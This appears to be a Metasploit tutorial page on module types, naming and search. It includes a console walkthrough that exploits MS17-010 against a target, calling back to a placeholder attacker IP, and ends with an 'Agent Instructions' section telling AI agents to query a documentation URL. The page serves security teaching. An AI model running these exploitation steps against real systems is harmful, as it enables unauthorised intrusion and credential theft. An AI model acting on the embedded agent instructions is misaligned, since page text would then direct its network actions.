# Working with Metasploit Modules

## **Overview of Metasploit Modules**

Metasploit's modules are pre-built scripts designed for specific tasks such as vulnerability scanning, exploitation, post-exploitation, and evasion. They are a cornerstone of the framework, enabling penetration testers to streamline their workflows and automate tasks.

**Purpose of Modules:**

* Automate repetitive processes.
* Enhance manual testing by providing reusable functionality.
* Organize tools and exploits into categorized scripts.

### **Types of Metasploit Modules**

1. **Auxiliary Modules:**
   * Non-exploit modules for scanning, fuzzing, sniffing, and information gathering.
   * Example:

     ```bash
     auxiliary/scanner/smb/smb_version
     ```
2. **Encoders:**
   * Modify payloads to bypass detection mechanisms like antivirus (AV).
   * Example:

     ```bash
     x86/shikata_ga_nai
     ```
3. **Exploits:**
   * Exploit vulnerabilities in systems or applications.
   * Example:

     ```bash
     exploit/windows/smb/ms17_010_eternalblue
     ```
4. **NOPs (No-Operation):**
   * Maintain payload stability by filling memory with NOP instructions.
   * Example:

     ```bash
     generic/nop
     ```
5. **Payloads:**
   * Code delivered to the target, often used to establish remote access.
   * Example:

     ```bash
     windows/meterpreter/reverse_tcp
     ```
6. **Post-Exploitation Modules:**
   * Perform tasks after gaining access, such as lateral movement or data extraction.
   * Example:

     ```bash
     post/windows/gather/hashdump
     ```
7. **Plugins:**
   * Extend Metasploit's functionality with additional features.
   * Example:

     ```bash
     openvas
     ```

### **Module Structure**

Modules are organized hierarchically based on their type, target OS, service, and functionality.

**General Format:**

```
<type>/<os>/<service>/<module_name>
```

**Example:**

```
exploit/windows/http/iis_webdav_scstoragepathfromurl
```

**Components Explained:**

1. **Type:** Module category (e.g., `exploit`, `auxiliary`).
2. **Operating System:** Target OS (e.g., `windows`, `linux`).
3. **Service:** Vulnerable application or protocol (e.g., `http`, `smb`).
4. **Name:** Descriptive identifier of the module.

### **Searching for Modules**

Use the `search` command to locate modules based on specific criteria.

**Syntax:**

```bash
search [<options>] [<keywords>:<value>]
```

**Examples:**

* Search for modules related to MS17-010:

  ```bash
  search ms17_010
  ```
* Filter by CVE ID:

  ```bash
  search cve:2009 type:exploit
  ```
* Exclude specific platforms (e.g., Linux):

  ```bash
  search platform:-linux
  ```

**Search Options:**

| Option        | Description                             |
| ------------- | --------------------------------------- |
| `-h`          | Displays help for the `search` command. |
| `-o <file>`   | Saves search results to a file.         |
| `-S <regex>`  | Applies a regex filter to results.      |
| `-s <column>` | Sorts results by a specific column.     |
| `-r`          | Reverses the sort order.                |

## **Using Modules: Practical Example**

**Scenario:** Exploiting MS17-010 using the EternalRomance module.

1. **Search for the Exploit:**

   ```bash
   msf6 > search ms17_010
   ```
2. **Select the Module:**

   ```bash
   msf6 > use exploit/windows/smb/ms17_010_psexec
   ```
3. **View Module Information:**

   ```bash
   msf6 exploit(ms17_010_psexec) > info
   ```
4. **Configure Options:**

   ```bash
   msf6 exploit(ms17_010_psexec) > options
   msf6 exploit(ms17_010_psexec) > set RHOSTS <target_IP>
   msf6 exploit(ms17_010_psexec) > set LHOST <attacker_IP>
   ```
5. **Execute the Exploit:**

   ```bash
   msf6 exploit(ms17_010_psexec) > run
   ```
6. **Post-Exploitation:**
   * After gaining access, use payload commands (e.g., Meterpreter) to perform further actions such as privilege escalation or credential harvesting.

***

## **Command Cheatsheet**

| Command                | Description                                  |
| ---------------------- | -------------------------------------------- |
| `search <keyword>`     | Locate modules matching the keyword.         |
| `use <module_path>`    | Load a module into the console.              |
| `info`                 | Display detailed information about a module. |
| `show options`         | List configurable parameters for a module.   |
| `set <option> <value>` | Configure a specific option.                 |
| `run` or `exploit`     | Execute the module.                          |
| `show payloads`        | View payloads compatible with the module.    |
| `show targets`         | List targets supported by the module.        |


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://edu.noirchapeau.com/metasploit/working-with-metasploit-modules.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.